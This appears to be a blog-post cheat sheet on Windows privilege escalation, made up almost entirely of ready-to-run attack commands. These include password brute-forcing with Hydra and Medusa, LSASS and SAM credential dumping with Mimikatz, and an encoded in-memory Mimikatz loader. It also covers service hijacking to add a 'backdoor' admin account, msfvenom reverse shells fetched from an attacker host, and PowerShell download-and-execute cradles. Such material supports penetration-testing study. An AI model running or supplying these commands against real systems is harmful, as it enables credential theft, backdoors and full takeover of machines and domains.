Privilege Escalation - Windows

Windows

Privilege escalation or vertical privilege escalation means elevating access from a limited user by abusing misconfigurations, design flaws, and features within the windows operating system.

    • Password Policy
      • Command# net accounts
      • Info: The net accounts command provides information about the password policy including, account lockout information
    • Remote Password Attacks
      • Reference: https://www.thehackr.com/create-custom-word-lists-using-cewl/
      • Info: Cewl can crawl websites to find interesting names and then outputs into a password dictionary file
      • Command# @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
      • Command# @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NUL
      • Command# medusa -U users -P <password list> -t 10 -h <host> -e ns -F -M <ssh | ftp> 
      • Command# medusa -u sa -P <path to password dictionary> -t 10 -h <host> -e ns -F -M mssql -n 1433
      • Info: Medusa is remote bruteforce tool <Brute-forcing passwords should be used if "NOTHING" works, last approached after attempting exploits>
      • Command# ncrack -vv –user <user> -P <path to password dictionary> –connection-limit 1 rdp:/<remote ip>
      • Info: ncrack is a remote bruteforce tool that can bruteforce rdp logins <Brute-forcing passwords should be used if "NOTHING" works, last approached after attempting exploits>
      • Command# hydra -P password-file.txt -v $ip snmp
      • Info: Hydra brute force against SNMP
      • Command# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
      • Info: Hydra FTP known user and password list
      • Command# hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
      • Info: Hydra SSH using list of users and passwords
      • Command# hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
      • Info: Hydra SSH using a known password and a username list
      • Command# hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
      • Info: Hydra POP3 Brute Force
      • Command# hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
      • Info: Hydra SMTP Brute Force
      • Command# hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
      • Info: Hydra attack http get 401 login with a dictionary
      • Command# hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
      • Info: Hydra attack Windows Remote Desktop with rockyou 
      • Command# hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
      • Info: Hydra brute force a Wordpress admin login
    • Local Password Attacks (require administrative access>
      • Command# powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
      • Info: Injects Mimikatz in memory and dump creds
      • Command# procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
      • Command# mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
      • Info: Procdump can be used dump contents from lsass and then mimikatz can be used to extract passwords offline
      • Command# C:\> reg.exe save hklm\sam c:\temp\sam.save
      • Command# C:\> reg.exe save hklm\security c:\temp\security.save
      • Command# C:\> reg.exe save hklm\system c:\temp\system.save
      • Info: dump password contents to disk 
      • Command: secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
      • Info: secretsdump.py can be used to retrieve ntlm hashes 
      • Referencehttps://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
      • Command# ./hate_crack.py usage: python hate_crack.py <hash_file> <hash_type>
      • Referencehttps://github.com/trustedsec/hate_crack
      • Command# .\Invoke-NinjaCopy.ps1 -path "c:\windows\system32\config\system" -localdestination "c:\system"
      • Command# .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\<file-path\sam"
      • Command# .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\security" -LocalDestination "c:\security"
      • Info: Invoke-NinjaCopy can be used to retrieve password contents when files are locked
      • Referencehttps://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
      • Reference: ntds_decode.exe https://goo.gl/bpdv9d
      • Command# vssadmin create shadow /for=C:
      • Command# copy \\?GLOBALROOT\Device\Harddisk\VolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
      • Command# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
      • Info: volume shadow copy utility, vssadmin can be used to retrieve ntdis.dit and system which contains domain passwords stored on domain controllers
      • Command# python esedbxtract.py -n ntds.dit -s system
      • Info: A script to extract password hashes from a domain controller using the NTDS.dit file and SYSTEM hive.
      • Referencehttps://bitbucket.org/grimhacker/esedbxtract
      • Command# pth-winexe --user=<domain/workgroup>/<user>%<ntlm hash> //<remote ip> cmd
      • Command# wce.exe -s <computer name>:<user>:<ntlm hash>
      • Info: Pass The Hash, technique wce supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).
      • Info: Pass The Hash Tools http://chousensha.github.io/blog/2015/04/04/kali-tools-catalog-password-attacks/
  • Services (running with higher privileges)
    • Permissions on Services
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/accesschk.exe','accesschk.exe')
      • Referencehttps://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
      • Info# Check for read and write permissions on windows services 
      • accesschk  -kwsu <hostname>\<privusr> hklm\system\currentcontrolset\services
      • Info# modify vulnerable service 
      • red add HKLM\SYSTEM\CurrentControlSet\Services\<vulnerable_service> /v ImagePath /d "c:\temp\payload.exe"
      • Info: XP requires Accesschk version 5.2
      • Command# accesschk.exe -uwcqv *
      • Info: Executing accesschk -uwcqv will check for accounts with modifiable permissions
      • Command# sc qc "vuln-service"
      • Command# sc config "vuln-service" binpath= "net user backdoor P@$$w0rd123! /add"
      • Command# sc stop "vuln-service"
      • Command# sc start "vuln-service"
      • Command# sc config "vuln-service" binpath= "net localgroup administrators backdoor /add"
      • Command# sc stop "vuln-service"
      • Command# sc start "vuln-service"
      • Comnand# sc stop <vuln-service>
      • Command# sc config <vuln-service> binPath= "<file path to reverse shell executable>" depend= "" start= demand obj= ".\LocalSystem" password= ""
      • Command# sc start <vuln-service>
      • Info: If the logged in user has modifiable permissions on a service running with higher access, execute the sc qc command on the writable service, (the results from sc qc will include the service configuration, which contains the binary used, and the account used to run the service
                          Then execute the sc config, sc stop and sc start commands shown above to elevate access by creating a new user
    • Permissions on Service Executables
      • Command# icacls "<file path>" 
      • Info: The results from the sc qc command will show the service executable, after identifying the file path, execute icacls on the file path to show the permissions
      • Command# On the attacker box execute msfvenom -p windows/shell_reverse_tcp lhost= lport= -f exe -o <name of the service to replace>
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/<service-executable.exe','service-executable.exe')
      • Info: Replace the windows service executable with a reverse shell
    • Unquoted Windows Service Paths
      • Command wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
      • Info: After executing the command shown above look for the file path which contains the executable 
      • Info: Use icacls "<file path> to check the permissions and look for modifiable permissions
      • Command# icacls "C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ovpnagent.exe"
      • Info: If the user does not have permissions to modify the executable, continue searching based on the first word within the directories specified and implant an executable, then name it according to there sub directories tell the user has modifiable permissions, then drop a reverse shell in its directory
      • Command# icacls "C:\"
      • Command# msfvenom -p windows/shell_reverse_tcp lhost=<attacker_ip> lport=<attacker_listeningport> -f exe -o Program.exe
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Progam.exe')
      • Command# icacls "C:\Program Files (x86)\"
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program Files (x86)\OpenVPN.exe')
      • Command# icacls "C:\Program Files (x86)\OpenVPN Technologies\"
      • Commandpowershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel.exe')
    • Services Containing Orphaned DLLs
      • Info: Known Services with orphaned dlls
        • Windows 7 32/64 bit 
          • IKE and AuthIP IPsec Keying Modules (IKEEXT)   – wlbsctrl.dll
            • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker-ip>/Ikeext-Privesc.ps1','Ikeext-Privesc.ps1')
            • Reference: https://goo.gl/bKJbW9
            • Info: Automatically detects and exploits the IKE and AuthIP IPsec Keyring Modules Service
            • The exploit creates a user called backdoor with password p@$$w0rd123! and assigns it to the local administrators group
          • Windows Media Center Receiver Service (ehRecvr)  – ehETW.dll
          • Windows Media Center Scheduler Service (ehSched) – ehETW.dll
          • Info: The Windows Media Center Services startup type is set to manual and status not started It will only elevate to Network service privileges, from here it would be good to hijack a token using the lonley potato technique
          • Info: Windows Media Center Services can be started through the following scheduled tasks.
            • schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\mcupdate"
            • schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\MediaCenterRecoveryTask"
            • schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\ActivateWindowsSearch"
        • Windows XP 
          • Automatic Updates (wuauserv) – ifsproxy.dll
          • Remote Desktop Help Session Manager (RDSessMgr) – SalemHook.dll
          • Remote Access Connection Manager (RasMan) – ipbootp.dll
          • Windows Management Instrumentation (winmgmt)  – wbemcore.dll
        • Additional Vulnerable Services
          • Audio Service (STacSV)    – SFFXComm.dll SFCOM.DLL 
          • Intel(R) Rapid Storage Technology (IAStorDataMgrSvc)    – DriverSim.dll
          • Juniper Unified Network Service(JuniperAccessService)   – dsLogService.dll
          • Encase Enterprise Agent  – SDDisk.dll 
          • Referencehttps://www.greyhathacker.net/?p=738
        • Info: Check Permissions on folders that are used in part of the default search order
          • DLL Hijacking
            • Current Directory Exploitable
            • and folder in %PATH% Exploitable
          • Note: Locating Missing DLLS
            • Load Procmon 
            • include .dll
            • include NAME NOT FOUND
            • include folder in path
          • Note: C:\windows\system32 (limited users usually do not have access to write to this directory)
          • C:\Windows\system (limited users usually do not have access to write to this directory)
          • C:\windows (limited users usually do not have access to write to this directory)
          • Note Locating Implant Folders
            • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/ankh2054/windows-pentest/master/Powershell/folderperms.ps1','C:\folderperms.ps1')
            • Command# powershell -ep bypass .\folderperms.ps1
            • Info: PowerShell script to automatically detect writable directories stored in %path%
            • Command: echo %path%
            • Info: echo %path% will print out the directories stored in the system or the user path
            • Info: Once a directory is found, implant a dll that creates a user and adds the user to the local administrators group
            • Referencehttps://github.com/newsoft/adduser/blob/master/adduser.c
        • Note Check Permissions On Files And Folders
          • Command# accesschk.exe -qwsu "Authenticated Users" *
          • Command# accesschk.exe -qwsu "Everyone" *
          • Command# accesschk.exe -qwsu "Power Users" *
      • Runtime DLL Names
  • Scheduled Tasks (running with higher privileges)
    • Command: schtasks
    • Info: Prints out timestamps for scheduled tasks
    • Command: schtasks /query /fo LIST /v 
    • Info: Prints out scheduled tasks configuration including executables, with file paths Useful in identifying executables that can be modified 
    • Command# cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
    • Info: Filter down to tasks that are running as system 
    • Info: Take note on scheduled tasks that run on ONLOGON and ONSTART, as these will be initiated by the system, and allow elevated access
    • Command# schtasks /end /tn <task name>
    • Info: Ends a scheduled task
    • Command# schtasks /run/tn <task name>
    • Info: Runs a scheduled task
    • ReferenceMS10-092 Task Scheduler exploit https://goo.gl/cM12Ku 
    • Info: MS10-092 Task Scheduler zero day exploit, creates user backdoor with password p@$$w0rd123! and assigns it to the local administrators group
    • Info: Supporting OS Windows 7/2008 x86/x64
    • Command: AT xx:xx <24 hour> /Interactive cmd.exe 
    • Info: On XP systems the AT command can be abused to gain system access, however the attack requires administrative access.
  • AutoStart Process (running with higher privileges)
    • Modifiable AutoRun Binaries/Scripts in registry
    • Command: autorunsc.exe -a | findstr /n /R "File\ not\ found"
    • Reference: https://goo.gl/i2rddj
    • Info: Autorunsc should be downloaded from the reference link, it is useful to identify missing files that can be used to implant a backdoor
    • Info: Once the file is identified use icacls to check the permissions against the default search order, start with the current working directory then
      • C:\Windows\System32
      • C:\Windows\
      • Current Working Directory
      • %path% 
  • Installed Applications
    • Command# wmic product get name,version /format:csv
    • Info: Lists installed products in a csv format, locate the version info and search google.com to see if there are vulnerabilities associated with them.
  • Installed Drivers
    • Command# DRIVERQUERY 
  • Interesting Files Containing Creds
    • Command# dir /s access.log error.log
    • Info: Find Apache web logs
    • Command# dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
    • Info: Find XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files
    • Command# dir /a C:\inetpub\
    • Command# type C:\Windows\System32\inetsrv\config\applicationHost.config
    • Info: Find IIS Inetpub Files
    • Command
    • Command# findstr /si password *.txt
    • Command# findstr /si password *.xml
    • Command# findstr /si password *.ini
    • Command# dir /s sysprep.inf sysprep.xml unattended.xml unattend.xml unattend.txt 2>nul
    • Command# dir /b /s vnc.ini ultravnc.ini 2>nul
    • Command# dir /s *pass* == *cred* == *vnc* == *.config*
    • Command# findstr /spin "password" *.*
    • Command#  dir /b /s Groups.xml Drives.xml DataSources.xml Printers.xml Services.xml ScheduledTasks.xml 2>nul
    • Info# CD c:\windows\sysvol and check group these group policy prefences
    • Command# icacls %SYSTEMROOT%\repair\SAM
    • Command# icacls %SYSTEMROOT%\System32\config\RegBack\SAM
    • Command# icacls %SYSTEMROOT%\System32\config\SAM
    • Command# icacls %SYSTEMROOT%\repair\system
    • Command# icacls %SYSTEMROOT%\System32\config\SYSTEM
    • Command# icacls %SYSTEMROOT%\System32\config\RegBack\system
    • Info: Decrypt Group Policy Preference Files with gp3finder -D <cpassword>
    • Referencehttps://goo.gl/NHF3nP
    • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1""");Get-GPPPassword
    • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1""");Get-GPPPassword -Server <computer domain name>
    • Info: Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
    • Command# cmdkey /list
    • Info: List cached credentials in the Credential Manager Database
    • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1""");Get-VaultCredential
    • Info: Displays Windows vault credential objects including cleartext web credentials
  • Interesting Data Stored In The Registry
    • Command# reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • Info: The AlwaysInstallElevated value makes it possible to execute backdoor msi under system
    • Command# reg query "HKCU\Software\ORL\WinVNC3\Password"
    • Info: Checks for VNC passwords in the registry (Requires Admin Access)
    • Command# reg query "HKLM\SOFTWARE\Microsoft\Windows (NT\Currentversion\Winlogon"
    • Info: Checks for AutoLogin Creds
    • Command# reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 
    • Info: Checks SNMP passwords (Requires Admin Access)
    • Command# reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
    • Info: Checks Putty Credentials (Requires Admin Access)
    • Command#  reg query HKLM /f password /t REG_SZ /s
    • Command#  reg query HKCU /f password /t REG_SZ /s
    • Info: Search for password in registry
  • DLL Injection
  • Networking
    • Command# ipconfig /all
    • Info: List IP Configuration
    • Command# ipconfig /displaydns
    • Info: Display dns cache
    • Command# netstat -ano
    • Info: List listening network services
    • Command# ping x.x.x.255
    • Command# arp -a
    • Info: Ping network address and then use arp -a to identify other systems on the network
    • Info: arp -a also prints out mac addresses, which can be used for spoofing techniques
    • Command# route print
    • Info: Print routing information
    • Command# netsh dump
    • Info: Dump network configuration
    • Command# netsh firewall show state
    • Command# netsh firewall show config
    • Command# netsh advfirewall firewall show rule name=all
    • Info: Display firewall configuration
    • Command# reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
    • Info: Display SNMP configuration
    • Command# net share
    • Info: After listing shares use icacls to check their permissions 
    • Command: type C:\WINDOWS\System32\drivers\etc\hosts
  • File Transfer Techniques
    • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/nc.exe','nc.exe')
    • Command# nc -w 10 <destination_ip> <port> < <file>
    • Command# nc -lvp <port> > <flle>
    • Info: Send file to and receive file
    • Referencehttps://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
    • Command# echo open <attacker IP> 21> ftp.txt
    • Command# echo USER username password >> ftp.txt
    • Command# echo bin >> ftp.txt
    • Command# echo GET <file.exe> >> ftp.txt
    • Command# echo bye >> ftp.txt
    • Command# ftp -s:ftp.txt
    • Info: On Restricted systems echo can be used to echo commands to a ftp transfer script. To send files to the attack change GET to put
    • Command# pip install wsgidav cheroot 
    • Info: Install wsgidav on the attacker machine and mkdir /tmp/transfer_files, then chmod -R 7777 /tmp/transfer_files
    • Command# wsgidav --host=0.0.0.0 --port=80 --root=/tmp/transfer_files
    • Info: On the attacker machine start wsgidav service
    • Command# net use <drive_letter> http://<attacker ip>/
    • Info: On the target computer mount the share of the attacker
  • Remote Port Forwarding
    • Command# plink.exe -l <attacker_username> -pw <attacker_password> -C -R <port-to-remote-forward>:<dual-homed-transfer-ip>:<port-to-listen-on> <attacker_ipaddress>
    • Example: plink.exe -l root -pw root -C -R 135:10.10.102.103:135 10.10.102.56
    • Info: Pivoting off a system that is dual homed in a restricted network can be used to forward ports to systems within that network
  • Tunneling
  • UAC LPE Bugs
  • PowerShell Applocker Bypass
  • OS Specific LPE Attacks
  • NTLM Authentication Spoofing Attack
  • Elevating Administrator To System
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -Enumerate
    • Info: This script requires Administrator privileges, Requires PowerShell Session, will enumerate available account that can be manipulated
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
    • Info: This script requires Administrator privileges, Requires PowerShell Session, will enumerate available account that can be manipulated
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
    • Info: This script requires Administrator privileges, Requires PowerShell Session, Uses named impersonate to elevate the current thread token to SYSTEM with a custom service and pipe name, requires SeImpersonatePrivilege
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System -Technique Token
    • Info: This script requires Administrator privileges, Requires PowerShell Sessions, Uses token duplication to elevate the current thread token to SYSTEM, requires SeDebugPrivilege
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System 
    • Info: This script requires Administrator privileges, Requires PowerShell Session, Uses named impersonate to elevate the current thread token to SYSTEM, requires SeImpersonatePrivilege
Race Condition Attacks
Automation Scripts
  • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1""");Invoke-HostEnum -ALL
  • Info: Windows Privilege Escalation Enumeration Script
  • Reference:Windows Priv ToolBox, https://goo.gl/ZX2zAYhttps://goo.gl/xYFi41 (ToolBox)
  • Infohttps://github.com/GhostPack
Info: DLL-Hijack scanner
https://github.com/Cybereason/siofra
winrs https://ss64.com/nt/winrs.html
Resources:
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
Info: Common Windows DLLs Used for DLL Hijacking
http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
Info: Useful Red Team TIPS
https://github.com/vysec/RedTips/blob/master/README.md
Info: Restoring Active Directory from ntds.dit file, load into read only domain controller
https://www.dell.com/support/article/us/en/19/sln289101/windows-server-active-directory-database-repair-after-domain-controller-failure?lang=en
Info: Offline AD attacks
https://www.dsinternals.com/wp-content/uploads/HIP_AD_Offline_Attacks.pdf
Red Team Tips
Impersonating TrustedInstaller 

Import-Module = https://github.com/google/sandbox-attacksurface-analysis-tools/blob/master/NtObjectManager/NtObjectManager.psm1
execute:

  • Set-NtTokenPrivilege SeDebugPrivilege
  • Start-Service TrustedInstaller ("Any Service you want to impersonate")
  • $p = Get-NtProcess -Name TrustedInstaller.exe (Any Process you want to impersonate or the service process you initiated from step2)
  • $t = $p.OpenToken()
  • $t.Groups | Where-Object {$_.Sid.Name -math "TrustedInstaller"} (Queires Sid of Target)
  • $proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p




Comments

Post a Comment

Popular Posts